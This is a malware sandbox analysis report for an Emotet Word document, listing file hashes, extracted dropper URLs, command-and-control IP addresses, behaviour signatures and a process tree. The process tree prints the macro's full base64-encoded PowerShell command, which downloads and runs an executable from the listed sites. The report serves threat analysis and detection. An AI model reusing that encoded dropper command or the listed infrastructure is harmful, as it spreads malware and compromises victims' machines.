Overview

overview

10

Static

static

8

emotet_e1_...oc.doc

windows7_x64

10

emotet_e1_...oc.doc

windows10_x64

10

Analysis

  • max time kernel
    127s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 07:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc

  • Size

    172KB

  • MD5

    2e5604fc710cb5f7d0802eed16d9974b

  • SHA1

    1d3b14e0647a32071714a9c318e7ba88fcac9b36

  • SHA256

    7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9

  • SHA512

    58104d7c98bd3dcaf7d32b8ab75c3051ba1ce631f38e84ad5dba74319d364d88f9d9efafb54508ea7dbf9812af4dce2a5dc2ab61f74dd2b6d04a7e5d8df7056e

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://eldridgelondon.com/wp-admin/QS/
exe.dropper

http://empmtg.com/guestbook/uQ4qC339/
exe.dropper

http://elisent.com/assets/ReH6966/
exe.dropper

http://elifmakina.net/ww4w/WnRLv/
exe.dropper

http://eliteseobusiness.com/takeout.eliteseobusiness.com/GYa538680/

Extracted

Family

emotet

C2

179.60.229.168:443

185.94.252.13:443

189.218.165.63:80

77.90.136.129:8080

217.199.160.224:7080

104.131.41.185:8080

2.47.112.152:80

185.94.252.27:443

186.250.52.226:8080

51.255.165.160:8080

68.183.170.114:8080

191.99.160.58:80

104.131.103.37:8080

181.31.211.181:80

202.62.39.111:80

83.169.21.32:7080

87.106.46.107:8080

72.47.248.48:7080

177.75.143.112:443

190.17.195.202:80
rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1464
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFAAUwBVAEMAVAB6AGMAZAAgAD0AIAAnADkAMAAzACcAOwAkAFcAWABDAEQAWgBwAHMAbgA9ACcATABHAFoAUQBTAG8AZQBvACcAOwAkAEQASABFAEMAUwBpAG0AeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABTAFUAQwBUAHoAYwBkACsAJwAuAGUAeABlACcAOwAkAFMAVwBLAEQATAB0AGMAaQA9ACcASABJAFMARwBPAGIAawBnACcAOwAkAEoATABEAEIATABpAGkAZgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAWQBRAEwAUQBZAGcAaQBnAD0AJwBoAHQAdABwADoALwAvAGUAbABkAHIAaQBkAGcAZQBsAG8AbgBkAG8AbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUQBTAC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG0AdABnAC4AYwBvAG0ALwBnAHUAZQBzAHQAYgBvAG8AawAvAHUAUQA0AHEAQwAzADMAOQAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQBzAGUAbgB0AC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAFIAZQBIADYAOQA2ADYALwAqAGgAdAB0AHAAOgAvAC8AZQBsAGkAZgBtAGEAawBpAG4AYQAuAG4AZQB0AC8AdwB3ADQAdwAvAFcAbgBSAEwAdgAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQB0AGUAcwBlAG8AYgB1AHMAaQBuAGUAcwBzAC4AYwBvAG0ALwB0AGEAawBlAG8AdQB0AC4AZQBsAGkAdABlAHMAZQBvAGIAdQBzAGkAbgBlAHMAcwAuAGMAbwBtAC8ARwBZAGEANQAzADgANgA4ADAALwAnAC4AIgBTAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAUwBHAFYAUwBnAHgAdgA9ACcASwBBAFcAVABFAG0AcABtACcAOwBmAG8AcgBlAGEAYwBoACgAJABOAFoAWQBUAFYAdgByAGsAIABpAG4AIAAkAFkAUQBMAFEAWQBnAGkAZwApAHsAdAByAHkAewAkAEoATABEAEIATABpAGkAZgAuACIARABPAHcAbgBgAGwAbwBBAEQAZgBgAEkAYABMAEUAIgAoACQATgBaAFkAVABWAHYAcgBrACwAIAAkAEQASABFAEMAUwBpAG0AeQApADsAJABIAFQATABKAEIAcgBuAGwAPQAnAEkARQBSAFgARgBsAGYAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEQASABFAEMAUwBpAG0AeQApAC4AIgBsAGAARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA3ADMANwAwACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBFAGAAQQB0AEUAIgAoACQARABIAEUAQwBTAGkAbQB5ACkAOwAkAFgARABFAEYAUQBqAHMAaQA9ACcATgBFAEcAUgBDAGEAZABuACcAOwBiAHIAZQBhAGsAOwAkAEIAUQBPAEkASABiAG8AcgA9ACcATQBWAEwATwBLAHEAbwBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQATgBWAFoASgBpAGkAeAA9ACcAQwBNAFAAWABCAHkAaABzACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1768
  • C:\Users\Admin\903.exe
    C:\Users\Admin\903.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1132
    • C:\Windows\SysWOW64\KBDCZ2\dbnmpntw.exe
      "C:\Windows\SysWOW64\KBDCZ2\dbnmpntw.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1564

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1132-12-0x00000000002E0000-0x00000000002EC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1464-2-0x00000000087E0000-0x00000000087E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1464-4-0x0000000006C60000-0x0000000006E60000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1464-5-0x000000000AD30000-0x000000000AD34000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1464-6-0x000000000BDB0000-0x000000000BDB4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1464-9-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1564-15-0x00000000001F0000-0x00000000001FC000-memory.dmp

    Filesize

    48KB

    Download